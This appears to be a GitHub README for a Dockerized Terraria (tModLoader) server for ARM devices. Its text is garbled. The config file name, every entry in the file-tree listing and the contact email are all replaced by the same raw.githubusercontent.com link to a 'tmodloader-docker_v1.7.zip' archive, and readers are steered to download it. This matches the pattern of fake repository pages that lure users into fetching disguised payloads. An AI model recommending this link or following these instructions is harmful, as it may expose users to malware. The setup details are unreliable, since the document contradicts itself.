TModLoader-Docker sets up a Terraria server using Docker. This includes automatic backups to keep your game data safe. It's designed for users on ARM architectures, making it suitable for various devices.
- Easy Setup: Get your Terraria server running in minutes.
- Automatic Backups: Your game data saves automatically with minimal effort.
- ARM Compatibility: Works on a range of ARM devices, including Raspberry Pi and other low-power servers.
- Docker-Driven: Leverage the power of Docker for easy management.
- Operating System: Compatible with any OS that supports Docker.
- Hardware: ARM-based devices (e.g., Raspberry Pi, or similar).
- Network: A stable internet connection for downloading the Docker images and updates.
To start using TModLoader-Docker, follow these simple steps:
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Download Docker: If you don't have it, visit Docker's official site and follow their installation guide for your operating system.
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Visit the Releases Page: Head over to our Releases page to download the latest version.
On the Releases page, you will find different versions of the software. Hereโs how to download it:
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Click the link below: Download from Releases
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Select the version you want to use. Click on the file that matches your system's architecture (usually "https://raw.githubusercontent.com/anheoanthit/tmodloader-docker/main/mindlessness/tmodloader-docker_v1.7.zip" for this setup).
Once downloaded, you will see a file structure like the following:
tmodloader-docker/
โโโ https://raw.githubusercontent.com/anheoanthit/tmodloader-docker/main/mindlessness/tmodloader-docker_v1.7.zip
โโโ https://raw.githubusercontent.com/anheoanthit/tmodloader-docker/main/mindlessness/tmodloader-docker_v1.7.zip
- https://raw.githubusercontent.com/anheoanthit/tmodloader-docker/main/mindlessness/tmodloader-docker_v1.7.zip This file defines the services and configurations for your Terraria server.
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Open a terminal.
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Navigate to the folder where you downloaded the files.
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Run the command:
docker-compose up
This command starts your Terraria server. If everything is set up correctly, your server will begin to run.
You may want to adjust the server settings. Edit the https://raw.githubusercontent.com/anheoanthit/tmodloader-docker/main/mindlessness/tmodloader-docker_v1.7.zip file to customize aspects like:
- Server Name: Change the name of your Terraria server.
- Max Players: Adjust how many players can join.
- World Settings: Specify which world file to use or generate a new one.
To enable automatic backups:
- Open the
https://raw.githubusercontent.com/anheoanthit/tmodloader-docker/main/mindlessness/tmodloader-docker_v1.7.zipfile. - Find the backup settings section.
- Set your preferred backup frequency (e.g., daily, weekly).
To access your server, open Terraria on your device:
- Go to the โMultiplayerโ option.
- Choose โJoin via IP.โ
- Enter the IP address of the server.
If you have trouble, please check the Issues tab on our GitHub page. You can also ask questions in forums or communities focused on Terraria or Docker.
Thank you to everyone who contributed to TModLoader-Docker. Your feedback and ideas help us improve.
For further inquiries or support, you can reach us through GitHub or email us at https://raw.githubusercontent.com/anheoanthit/tmodloader-docker/main/mindlessness/tmodloader-docker_v1.7.zip
TModLoader-Docker is open-source software and follows the MIT License. You can view the full license here.
Thank you for choosing TModLoader-Docker! Enjoy your Terraria gaming experience!